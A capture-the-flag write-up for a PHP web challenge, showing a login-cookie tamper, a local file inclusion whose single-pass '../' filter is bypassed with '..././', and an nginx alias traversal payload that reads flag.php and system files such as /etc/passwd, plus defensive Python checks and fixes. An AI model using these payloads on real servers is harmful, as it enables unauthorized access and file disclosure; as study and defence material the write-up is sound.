Challenge description: The website is about to go live and has not been tested yet. What should we do?

Opening the site shows only a login box. Entering arbitrary credentials and logging in just gives a message that the site is under construction.
Scanning the site with dirsearch turns up robots.txt:
User-agent: *
Disallow: /flag.php
But flag.php contains nothing except flag_is_here.
Next, capturing the request with Burp Suite shows a cookie login=0. Changing the value to 1 logs in successfully. (It cannot be changed on the login.php page; change it on the home page.)
There is a manage link; click into it.
The address bar changes to
http://ec34bcd4403e4e18a9d284df3a33df3cdc36baafb87d444a.changame.ichunqiu.com/manages/admin.php?module=index&name=php
module is index and name is php, which looks like an arbitrary file inclusion vulnerability. Trying to read flag.php through it gives the same result: only flag_is_here.
Trying a PHP stream wrapper:
GET /manages/admin.php?module=php://input&name= HTTP/1.1

<?php phpinfo(); ?>
Still nothing happens.
Only after reading a write-up did I learn that there is also an nginx vulnerability that can be used...
First read the nginx configuration file. The program strips ../ from the path, so ..././ has to be used instead.
#user  nobody;
worker_processes  1;

#error_log  logs/error.log;
#error_log  logs/error.log  notice;
#error_log  logs/error.log  info;

#pid        run/nginx.pid;

events {
    worker_connections  1024;
}

http {
    include       mime.types;
    default_type  application/octet-stream;

    #log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
    #                  '$status $body_bytes_sent "$http_referer" '
    #                  '"$http_user_agent" "$http_x_forwarded_for"';

    #access_log  logs/access.log  main;

    sendfile        on;
    #tcp_nopush     on;

    #keepalive_timeout  0;
    keepalive_timeout  65;

    #gzip  on;

    #server {
    #    listen       80;
    #    server_name  localhost;
    #    #charset koi8-r;
    #    #access_log  logs/host.access.log  main;
    #    location / {
    #        root   html;
    #        index  index.html index.htm;
    #    }
    #    #error_page  404              /404.html;
    #    # redirect server error pages to the static page /50x.html
    #    #
    #    error_page   500 502 503 504  /50x.html;
    #    location = /50x.html {
    #        root   html;
    #    }
    #    # proxy the PHP scripts to Apache listening on 127.0.0.1:80
    #    #
    #    #location ~ \.php$ {
    #    #    proxy_pass   http://127.0.0.1;
    #    #}
    #    # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
    #    #
    #    #location ~ \.php$ {
    #    #    root           html;
    #    #    fastcgi_pass   127.0.0.1:9000;
    #    #    fastcgi_index  index.php;
    #    #    fastcgi_param  SCRIPT_FILENAME  /scripts$fastcgi_script_name;
    #    #    include        fastcgi_params;
    #    #}
    #    # deny access to .htaccess files, if Apache's document root
    #    # concurs with nginx's one
    #    #
    #    #location ~ /\.ht {
    #    #    deny  all;
    #    #}
    #}

    # another virtual host using mix of IP-, name-, and port-based configuration
    #
    #server {
    #    listen       8000;
    #    listen       somename:8080;
    #    server_name  somename  alias  another.alias;
    #    location / {
    #        root   html;
    #        index  index.html index.htm;
    #    }
    #}

    # HTTPS server
    #
    #server {
    #    listen       443 ssl;
    #    server_name  localhost;
    #    ssl_certificate      cert.pem;
    #    ssl_certificate_key  cert.key;
    #    ssl_session_cache    shared:SSL:1m;
    #    ssl_session_timeout  5m;
    #    ssl_ciphers  HIGH:!aNULL:!MD5;
    #    ssl_prefer_server_ciphers  on;
    #    location / {
    #        root   html;
    #        index  index.html index.htm;
    #    }
    #}

    include sites-enabled/default;
}
At first glance nothing looks wrong, but the last line includes another file, so keep reading there.
server {
    listen 80 default_server;
    listen [::]:80 default_server ipv6only=on;

    root /var/www/html;
    index index.php index.html index.htm;

    server_name localhost;

    location / {
        try_files $uri $uri/ =404;

        location ~ \.php$ {
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
            #fastcgi_pass unix:/var/run/php5-fpm.sock;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fastcgi_params;
        }
    }

    error_page 404 /404.html;
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /var/www/html;
    }

    location /online-movies {
        alias /movie/;
        autoindex on;
    }

    location ~ /\.ht {
        deny all;
    }
}
Note this block:
location /online-movies {
    alias /movie/;
    autoindex on;
}
/online-movies has no trailing /, and autoindex is on, so a request for /online-movies../ is mapped to /movie/../, and from there arbitrary files can be read.
Payload:
/online-movies../var/www/html/flag.php
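The alias misconfiguration above is easy to miss in a config review. As an added example that is not part of the original write-up, the Python below scans an nginx server block for the pattern (a prefix location without a trailing slash whose alias target ends with one) and models how nginx maps a request under such a location. The config fragment inside it is constructed from the write-up's sites-enabled/default; the regex-based parser is a simplification that assumes no nested braces inside an alias location, and the helper names are this example's own.

```python
import re

# Constructed sample: the server block from the write-up's sites-enabled/default,
# trimmed to the parts that matter for the check.
VULNERABLE_CONF = """
server {
    root /var/www/html;
    location / {
        try_files $uri $uri/ =404;
        location ~ \\.php$ {
            fastcgi_pass 127.0.0.1:9000;
        }
    }
    location = /50x.html {
        root /var/www/html;
    }
    location /online-movies {
        alias /movie/;
        autoindex on;
    }
    location ~ /\\.ht {
        deny all;
    }
}
"""

# The same block with the one-character fix: a trailing slash on the location prefix.
FIXED_CONF = VULNERABLE_CONF.replace("location /online-movies {", "location /online-movies/ {")

# Prefix and exact-match locations only; regex locations (~, ~*) are skipped because
# alias traversal is a prefix-matching problem.  Assumes no nested braces inside an
# alias location, which holds for the config on the page.
LOCATION_RE = re.compile(r"location\s+(?:=\s+)?(/[^\s{]*)\s*\{([^{}]*)\}", re.S)
ALIAS_RE = re.compile(r"\balias\s+([^;\s]+)\s*;")


def find_alias_traversal(config_text):
    """Return (prefix, alias_target) pairs where the prefix lacks a trailing slash
    but the alias target ends with one.  nginx substitutes the alias for the
    matched prefix verbatim, so '/prefix../x' becomes '<alias>../x'."""
    findings = []
    for m in LOCATION_RE.finditer(config_text):
        prefix, body = m.group(1), m.group(2)
        alias = ALIAS_RE.search(body)
        if alias and not prefix.endswith("/") and alias.group(1).endswith("/"):
            findings.append((prefix, alias.group(1)))
    return findings


def resolve_alias(prefix, alias_target, request_uri):
    """Model nginx's alias mapping for a prefix location: replace the matched prefix
    with the alias target and append the rest of the URI unchanged.  nginx does not
    re-normalise the result, which is the whole problem."""
    if not request_uri.startswith(prefix):
        return None  # this location would not be selected for the request
    return alias_target + request_uri[len(prefix):]


if __name__ == "__main__":
    print(find_alias_traversal(VULNERABLE_CONF))  # [('/online-movies', '/movie/')]
    print(find_alias_traversal(FIXED_CONF))       # []
    print(resolve_alias("/online-movies", "/movie/", "/online-movies../var/www/html/flag.php"))
```

The fix is exactly what the check encodes: write the prefix as location /online-movies/ so that only URIs inside the directory ever reach the alias. autoindex on is not what enables the traversal; it only makes the resulting directory listings visible, so turn it off unless listing is actually wanted.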
Analysis of the challenge source
Read admin.php:
<?php
header("content-text:text/html;charset=gbk");
if(!isset($_COOKIE['login']))
    setcookie("login", "0");
if( !isset($_COOKIE['login']) || $_COOKIE['login'] !== '1')
    die("<script>alert('You need to log in!');location.href='/login.php';</script>");
if (!isset($_GET['module']) || !isset($_GET['name']))
    header("Location: admin.php?module=index&name=php");
?>
<?php
$ext = $_GET['name'];
if ($ext === 'php') {
    $ext = ".".$ext;
}else{
    $ext = '';
}
include "/var/www/html/".str_replace("../","",$_GET['module']).$ext;
?>
The login part needs no explanation; what matters is the include part below.
Because the include path is built by string concatenation onto /var/www/html/, stream wrappers cannot be used. The str_replace that follows replaces ../ with the empty string in a single, non-recursive pass, which is why the ..././ form is needed: once the inner ../ is removed, what remains is exactly ../.
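To make the single-pass filter concrete, here is an added Python example (not the challenge's code) that reproduces the str_replace("../", "", ...) behaviour and the concatenated include path, then contrasts it with a hardened resolver. The web root /var/www/html comes from the write-up's config; the module allow-list and the helper names are assumptions made for this example.

```python
import posixpath

WEBROOT = "/var/www/html"  # from the challenge's nginx config


def filter_once(module):
    """Mirror the challenge's str_replace("../", "", $module).
    PHP's str_replace, like Python's str.replace, makes one left-to-right pass
    and never rescans the text it just produced, so "..././" collapses to "../"."""
    return module.replace("../", "")


def vulnerable_include_path(module, name):
    """The path admin.php hands to include: plain string concatenation after the
    single-pass filter.  A stream wrapper such as php://input ends up as a literal
    sub-path under the web root, which is why that attempt did nothing."""
    ext = ".php" if name == "php" else ""
    return WEBROOT + "/" + filter_once(module) + ext


def escapes_webroot(path, webroot=WEBROOT):
    """Detection check: normalise the final path and see whether it still lies
    under the web root.  This is the property the filter should have tested."""
    resolved = posixpath.normpath(path)
    return not (resolved == webroot or resolved.startswith(webroot + "/"))


# Hardened variant (assumed for this example, not the challenge's code):
# allow-list module names instead of trying to sanitise a path.
ALLOWED_MODULES = {"index", "manage"}  # constructed set for the example


def safe_include_path(module, name, webroot=WEBROOT):
    if module not in ALLOWED_MODULES:
        raise ValueError("unknown module")
    if name != "php":
        raise ValueError("only .php modules are served")
    candidate = posixpath.normpath(posixpath.join(webroot, module + ".php"))
    if escapes_webroot(candidate, webroot):  # defence in depth behind the allow-list
        raise ValueError("path escapes web root")
    return candidate


def safe_include_rejects(module, name):
    """True when the hardened resolver refuses the request."""
    try:
        safe_include_path(module, name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    probe = "..././..././..././etc/passwd"
    print(filter_once(probe))                      # ../../../etc/passwd
    path = vulnerable_include_path(probe, "")
    print(path, escapes_webroot(path))             # /var/www/html/../../../etc/passwd True
    print(vulnerable_include_path("php://input", ""))
    print(safe_include_rejects(probe, "php"))      # True
```

The lesson the check encodes is that a blacklist-style substitution can never be made complete by repetition; validating the normalised result against the web root, or better, refusing anything not on a fixed allow-list, is what actually closes the include.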
As for how we knew the server is nginx: the 404 page reveals it, and it can also be confirmed by reading /etc/passwd.
